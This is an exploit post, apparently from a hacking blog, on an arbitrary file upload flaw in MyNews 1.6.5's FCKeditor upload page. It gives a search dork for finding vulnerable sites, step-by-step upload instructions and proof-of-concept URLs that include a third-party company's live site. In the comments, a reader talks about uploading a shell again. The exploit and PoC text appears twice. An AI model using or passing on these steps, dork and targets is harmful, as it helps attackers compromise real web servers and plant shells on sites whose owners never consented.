Filename | MyNews Arbitrary File Upload Vulnerability |
Permission | rw-r--r-- |
Author | Inveet.id |
Date and Time | 23.38 |
Label | Exploit |
Action |
[-] MyNews Arbitrary File Upload Vulnerability
Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
[-] Exploit
FCKeditor/editor/filemanager/upload/php/config.php
// SECURITY: You must explicitelly enable this "uploader".
$Config['Enabled'] = true ;
in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"
[-] PoC
Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
[-] Exploit
FCKeditor/editor/filemanager/upload/php/config.php
// SECURITY: You must explicitelly enable this "uploader".
$Config['Enabled'] = true ;
http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html
in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"
http://localhost/[path]/files/your_file.txt
[-] PoC
http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html
2 komentar:
Wew, nice, nice template. Xixixi
Ayo terapkan di => www.ryanbekabe.byethost14.com/MMOnLineScanner/Wew, nice, nice template. Xixixi
Ayo terapkan di => www.ryanbekabe.byethost14.com/MMOnLineScanner/
hahaha oke nanti ane coba upload shell lg kyk dulu :D
Posting Komentar